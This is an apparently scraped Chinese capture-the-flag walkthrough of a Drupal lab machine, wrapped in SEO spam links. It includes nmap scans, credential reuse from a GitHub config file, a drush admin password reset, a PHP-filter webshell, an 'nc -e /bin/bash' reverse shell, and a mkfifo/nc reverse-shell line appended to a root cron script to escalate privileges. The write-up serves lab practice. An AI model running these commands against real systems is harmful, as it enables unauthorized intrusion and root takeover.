当前位置: 首页 > news >正文

学生个人博客网站模板微营销平台

学生个人博客网站模板,微营销平台,网站qq号获取,做网站 侵权❤️博客主页: iknow181 🔥系列专栏: 网络安全、 Python、JavaSE、JavaWeb、CCNP 🎉欢迎大家点赞👍收藏⭐评论✍ 一、收集信息 1.查看主机是否存活 nmap -T4 -sP 192.168.216.149 2.主动扫描 看开放了哪些端口和功能 n…

❤️博客主页 iknow181
🔥系列专栏 网络安全、 Python、JavaSE、JavaWeb、CCNP
🎉欢迎大家点赞👍收藏⭐评论✍


在这里插入图片描述

一、收集信息

1.查看主机是否存活

nmap -T4 -sP 192.168.216.149

2.主动扫描

看开放了哪些端口和功能

nmap -A -p- 192.168.216.149

发现
22-ssh

80-http

3.whatweb扫描

发现有网站,进一步确认

4.搜索作者

发现下面有作者

去github上搜索一下,有没有相关内容

点击users,看

找到一个config.php文件,这是一个连接数据库的配置文件,里面有用户名和密码,可能和他的vps或者服务器的用户名密码匹配的

二、入侵目标主机

1.尝试进行ssh登录

2.查看文件

发现执行了/opt/scripts/backups.sh文件,生成了那些.gz的文件

3.进入文件夹

发现是一个备份数据库的sh文件,有可能是定时任务执行

4.利用drush

因为是drupal,所有有个drush命令

drush可以修改管理员用户

进入网站的根目录,修改管理员密码为123456(注意命令不要有空格)

5.进入网站后台

可以看到有个login

可以进入192.168.216.149/user/login,登录admin

进入content,编辑文章

最好能写入php代码

6.安装php插件

整一个drupal的php插件

加载安装包

安装成功

勾选php filter,并且激活

回到content发现有phpcode

7.生成木马文件写入

将其复制到content中

7.连接

8.nc连接

因为这个木马可能不太稳定

kali:nc -lvp 9988

目标:nc -e /bin/bash 192.168.216.161 9988

连接成功

9.美化界面

python -c 'import pty;pty.spawn("/bin/bash")'

三、提权

1.kali监听1234端口

2.将命令写入backups.sh

因为backups.sh是一个计划任务,用的root权限

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.216.161 1234 > /tmp/f" >> backups.sh"

3.等待计划任务执行

4.拿到flag

在这里插入图片描述

http://www.yidumall.com/news/101399.html

相关文章:

  • 网站有备案号吗seo创业
  • 中国建筑集团招聘信息网站标题算关键词优化吗
  • 深圳电商网络网站建设电话销售外呼系统软件
  • 个人网站页面模板html网络广告是什么
  • 个人做网站有什么好处首页百度
  • 周口网站设计发帖推广哪个平台好
  • 怎么给别人做网站优化怎样做网站平台
  • 珲春网站建设临沂网站建设优化
  • 物流公司官方网站建设方案口碑营销策略
  • 香水网站设计网页成人教育机构排行前十名
  • 怎么查询网站真假备案济南seo外贸网站建设
  • 福州网站开发定制沧州网站运营公司
  • 太原做网站武汉武汉最新
  • 有帮人做网站的人吗新闻发布平台
  • dede网站qq类资源源码注册网站怎么注册
  • 怎么在百度自己创网站小程序推广的十种方式
  • 关于解决网站 建设经费的请示汕头seo不错
  • 如何访问自己做的网站互联网项目
  • 大连全套网站建设接广告的网站
  • 怎么做移动端网站计算像素腾讯广点通广告投放平台
  • 可以做ps的网站2022最新时事新闻及点评
  • 竞价推广网站建设济南优化seo公司
  • 电子商务网站 费用四年级2023新闻摘抄
  • php跳转到其他网站网店推广运营策略
  • 莱芜杂谈莱芜在线论坛网站建设优化的技巧
  • 台州网站推广南宁百度seo建议
  • 品牌网站建设 细致磐石网络企业网络营销顾问
  • web前端技术栈有哪些信阳seo优化
  • 中国电商网站排行榜seo专业学校
  • 织梦网站后台logo删除常用的网络推广的方法有哪些